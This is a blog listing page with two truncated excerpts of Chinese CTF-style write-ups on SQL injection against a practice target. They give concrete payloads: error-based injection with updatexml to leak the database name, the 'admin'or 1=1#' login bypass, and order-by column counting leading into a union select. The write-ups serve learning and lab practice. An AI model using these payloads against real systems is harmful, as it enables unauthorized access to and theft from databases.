摘要: 1、burpsuit抓包,跑一下fuzz 发现长度为736的都被过滤掉了 2、观察error界面,猜测应该是报错注入 先爆数据库名 1 admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#、0x7e代表~ 得到数据库名geek 3、爆表名 1 阅读全文
posted @ 2022-07-22 22:52 heartBroken 阅读(105) 评论(0) 推荐(0) 编辑
摘要: 1、打开靶机,先尝试一下万能密码 1 admin'or 1=1# 2 1234 2、尝试爆字段 1 admin'order by 1# 2 admin'order by 2# 3 admin'order by 3# 4 admin'order by 4# 3、看回显位置 1 1' union sel 阅读全文
posted @ 2022-07-22 21:59 heartBroken 阅读(205) 评论(0) 推荐(0) 编辑